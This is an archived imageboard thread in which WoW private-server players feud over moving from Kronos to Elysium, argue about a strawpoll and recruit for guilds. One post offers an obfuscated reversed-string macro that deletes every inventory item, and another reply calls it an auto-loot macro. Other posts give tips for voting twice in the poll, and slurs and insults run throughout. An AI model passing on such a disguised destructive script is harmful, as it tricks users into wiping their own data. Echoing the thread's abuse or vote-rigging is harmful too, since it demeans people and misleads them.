Old Thread:

Other urls found in this thread:

valkyrie-wow.org/elysium
strawpoll.me/10801918
pastebin.com/yEK87sYM
strawpoll.me/10801918/r
twitter.com/NSFWRedditImage

Guys dont listen to the shills kronos will thrive elysium can suck my dick

Friendly reminder that we(anyone who matters and anyone with a brain) are moving to the new Valkyrie server.
Launches in less than a month, more info at valkyrie-wow.org/elysium

Kronos is a laggy, buggy shit hole run by pay to win, corrupt slavs.

Is it worth rolling on kronos? I haven't played since nost got shut down.

t. finalcuck after getting banned for botting

Kronosucks literally on suicide watch.

Don't worry, Elysium will save you.

With guild info for newbies.

No kronos is a buggy POS with loads of funserver changes and crashes more than nost did at xiao hour.
were all going to valk

Alright, faggots. It's time to settle this autism, once and for ask.
strawpoll.me/10801918
Vote.

Fuck off, Nihilcum.

If you haven't already rolled you might as well wait for Elysium.

>all these kronos players desperately trying to save their precious 60s

Loving every laugh. Face it, there will be a massive split that'll leave behind a few clingy husks that can't let go of their invested time, but a few weeks down the line when people catch wind of the top notch scripting quality (you can already test it and see for yourself on their PTR), even they will see themselves forced to surrender to the overewhelming population cut that will hit Kronos. There is only one truth, it's worth leaving your character behind for superior scripting and not-insane GMs.

Worry not though, everyone is welcome on Elysium, so long as you speak English in the public chats.

Then vote in the poll. We'll just see what we do.

>strawpoll holds any amount of credibility when you can just reset your ip

Nice joke, you made a contest of who can be arsed to keep the autism going for longer.

For people struggling with Pet Scripting this might help.
pastebin.com/yEK87sYM

Nice try shill, dup IP protection on this one. Just vote or STFU.

>strawpoll
kek
it will speak for itself when kronos is dead and valk is king. anybody who is anybody is rerolling on elysium.

Can someone tell me if this macro works?

/run f=function(i) o='' for I=-(string.len(i)),-1 do o=o..string.sub(i,-I,-I) end return o end RunScript(f("dne )(metIrosruCeteleD )P(metIyrotnevnIpukciP od 32,0=P rof"))

Are you stupid? You know that there is literally no protection against someone who has their mind set on rigging the system, right?

Yep

It works for deleting your items

wow. your actually retarded LOL

Looks like it works. Thanks for the auto-loot macro!

>shilling for a new server went up 70% after a known incessant shitposter gets perma banned from the server

Weird.

>mfw i did next lvl stream sniping on nost

What is up with the rampant Valkyrie/Elysium posting? I remember back when /Nosg/ has Kronos posters but it was never this bad holy fuck. These bastards need to start their own general at this point go make a /Valg/ so it can have 3 different posters samefagging each other already.

>Lmao I don't support voting for things because nobody agrees with me so it's rigged!

Literal Nihilum manchild right here.

got a video or vod?

fuck off kronos shill

I'm on your side pal, stop the friendly fire. I'm going Elysium.

Nice damage control, vote or gtfo. You're losing BTW.

nop he deleted it from his stream pretty quickly :/

Finalsperg got banned from kronos, now him and ogunderage wants everyone to play on a new server with them even though nobody likes them

>vote from phone
>turn on airplane mode
>turn off airplane mode
>vote again

Kronos 2:
- Alliance
for an invite, whipser: automute, qlurf, glurf, infamy, jaime or crabberson

Kronos 2:
- Alliance

Kronos 2:
- Alliance

Kronos 2:
- Alliance

As if anybody would actually do that? I bet you think all polls are rigged all of the time because they don't agree with you?
get out of your tinfoil retard.

L M A O

>Elysium so dead they have to shill in another server's general
L O L

You're actually catching up in the poll, no need to be sperg.

You underestimate how scared this general is. Sacrificing a character is not easy.

Elysium is happening bud, get fucked
strawpoll.me/10801918/r

52% no
48% yes
well that settles that

Nice poll lol.
>22 unique IP's in thread
>26 votes

Also I'm sure 120% of the people on the thread voted right?

I'll give it a rigged/10

that's the best I can do.

You guys are only arguing about this general, which will be peanuts in a sea of normies. Get your head out of the gutter for a moment and realize that good scripting has always been a magnet for the masses. Like many have pointed out already in threads before, witness it for yourself on their ptr.

Lets look at it this way, what do we gain from all moving to Valkyrie/Elysium/Flavor of the Month?

Less server crashes? Okay sure.

What do we lose? Well everything... Gear, gold, levels, a Veeky Forums guild thats slightly more cohesive that usual... and theres no guarantee that the new server will be any better scripted, and hell it'll probably choked with Russians.

So really, unless you've been banned recently, or kicked out of the guild... theres no real reason to hop unless the one server crash every 4 hours ruins your day...

Just ignore them m8, FinalFlash is so narcissistic he thinks everyone will drop their 60s and reroll to a new server just because he got banned and is mad

I would stay in k2 even if the guild died, valk doesn't have devs and their server has been on BWL for half a decade

No one is leaving, get over it.
>Implying the "rigged" votes are for no.
Heh.

>what do we gain

Who cares what the norm lords of Nihilum and these threads do? The question is whether the server is any good or not.
I could care less if the IF bridge RP brigade decides they don't need an actual functioning game to suck each other off.

Who the fuck is Crabberson? I didn't see him once when leveling, not even talking in guild chat.
Now all of a sudden he's Qlurf tier of clique.

>Who cares what the norm lords of Nihilum and these threads do?

because they are 90% of this threads posters/players, without them there will be no valk

hi

currently sitting at 24 days played, 10 days 19 hours at level 60

>this threads posters/players, without them there will be no valk
>200 people max that ever visit this thread

Are you retarded?

Yeah, without this thread it's impossible for a group to form on Elysium. The 20 or so relevant people in this thread will certainly make a huge impact in the grand scheme.

lmao, git a brain you scrub

Are you? There is 50 people alone online in Nihilum atm, double the amount of posters in this general

Like I said, without them there will be no Valk, just like there wasn't a feenix thread

>14 days /played to hit 60
Holy fuck.

he had like 40 days played on nost and was barely what? level 36 or something?

>Nihilum
>without them there will be no Valk

Nobody here gives a shit about your Veeky Forums hugbox retard
some of us actually want to play the game you know?

Hey guys can i have a serious answer about Kronos's servers state ? Like is it laggy, did they implement """fun""" things or i dno

K, have fun playing with no one and having a non-existent general then

>no guarantee that the new server will be any better scripted

you can literally go there right now and check it.

also, it's not even the dcs, but the rollbacks, lags, constant crashes that ruin dungeon runs, etc. i would be fine if it was a ddos attack or something, but it's been like this for months. i'm done with kronos because it will never get better.

>playing with Veeky Forums
>playing with no one

Are there actually people this fucking lonely here? This is just fucking depressing
please put yourself out of your misery you sad sack of shit.

Uhhh
>Veeky Forums Hugbox
What form of brain damage do you have son? If you want to play the game go play it. Why bother shitposting on Veeky Forums for Valkyrie/Elysium if you werent going to play with Veeky Forums'ers anyway?

I think I had 16 days on Nost when I got to 60, I'll upload a pic in like a month.

Don't bother rolling mate, there's a new server being released next month that we're all migrating to (most of us anyway).
You'll barely make it to 60 when we're gone.

wew so mad, why are you shilling so hard for us to play with you on some dogshit russian server?

>Why bother shitposting on Veeky Forums

Nice projection there shitlord, some of us actually try to use the thread for something other than annoying the shit out of people.

Out of spite for the shit quality of the server, it deserves to burn for the shit we had to put up with.

>Most of us anyway
5 rubles have been deposited into your account.

It is 1x, we have an Alliance raid guild called .

PM Glurf or Automute if you want an invite.

We are on K2.

*tips slipknot CD*

Besides the crashes, the server is fine. They're supposedly getting """"""hardware"""""" to fix it, but that hasn't happened yet. The scripting seems to be fine, and there is a shop. The only things that can be bought from the shop are mounts and a few pets. Players can sell or trade their characters to other players for kronos' fun bucks.

I wasnt even considering playing with you guys, i havent been following Kronos for a month and i wanted to know what's up

Like, did they fix the lag issues ?
Did they give lvl 60 boosters or any fucked up things like that

so far they haven't given any xp boosts or compensation on K2

Thanks for the answers

Ye lag is fixed, still crashes a few times a day though, no boosts

where were you?

>name blocked out by text bubble

REEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE

So you only got to 60 recently and you're immediately top clique? There's something not right there.

>14 days at 60 is recently
?

Misread your numbers.
I still don't trust you though.

saved,
what's that grey stain in the middle of the screen?

It's ok, I forgive you

he's friendly, good at his class and autistic enough to spend lots of hours organizing stuff

that's all it takes

Shit image quality, good picture.
Shit picture, perfect image quality.

Guys, you had 1 job.

>tfw missed the guild pic

fugggg :-D

I've got my eye on you

No, there's more to it than that. I'm going to get to the bottom of this.

Indi BTFO

Don't blame the quality. This is taken off video. Uploading later.

shoulda removed ranks n shit oh well

hes on the far left by denti

>That blur

This is an epic troll pic right?
The game doesn't actually look this terrible for anyone really right?

Guild pics are embarrassing as fuck. So glad I'm not around for any of them.

Haha yeah f-fuck them not like i w-want to play with /krog/ anyways

Lmao you mad you're not part of the clique mate?

>S-so g-glad I'm not in it! B-baka!